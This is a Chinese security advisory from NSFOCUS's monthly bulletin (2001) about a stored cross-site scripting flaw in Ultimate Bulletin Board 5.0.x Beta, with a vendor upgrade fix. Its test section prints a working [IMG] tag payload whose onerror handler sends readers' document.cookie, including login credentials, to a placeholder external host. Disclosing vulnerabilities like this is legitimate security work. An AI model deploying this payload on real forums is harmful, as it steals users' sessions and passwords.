首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第19期->最新漏洞
期刊号: 类型: 关键词:
UBB [IMG] 标签嵌入Javascript漏洞

日期:2001-02-19

受影响的系统:  
    Infopop Ultimate Bulletin Board 5.0.x Beta
       - Sun Solaris 8.0
       - RedHat Linux 7.0
       - OpenBSD OpenBSD 2.8
       - HP HP-UX 11.11
       - Debian Linux 2.2
       - Caldera eServer 2.3
       - BSDI BSD/OS 4.0.1
不受影响系统:  
    Infopop Ultimate Bulletin Board 6.0 Beta
描述:
--------------------------------------------------------------------------------


BUGTRAQ ID: 2408

Ultimate Bulletin Board 是 Infopop 开发的免费软件包,一种基于WWW界面的电子
公告板。上述beta版存在一个设计上的漏洞。由于对用户输入检查不充分,有可能在
[img]标签中嵌入单行javascript然后贴到讨论组上去,其他用户阅读回复该条消息
时,javascript被执行。UBB使用cookie技术记录登录用户的敏感信息,诸如用户名、
口令等等,cookie是保存在客户端的。利用前面描述的漏洞,恶意的远程用户有可能
获取其他用户的cookie。

<* 来源:Scott Ashman (sashman@jaspin.com) *>


测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



在文章中嵌入下列代码:

[IMG]test"onerror="this.src='http://xxx.xxx.com/page.cfm?'+escape(document.cookie);
[/IMG]

则任何用户在回复此消息时将导致他们的cookie内容被转发给一个外部主机。



--------------------------------------------------------------------------------
建议:

厂商补丁:

升级到Ultimate Bulletin Board 6.0 Beta即可:
Infopop upgrade Ultimate Bulletin Board 6.0 Beta
http://www.infopop.com/nonbusiness/nonbusiness_ubb.html

版权所有,未经许可,不得转载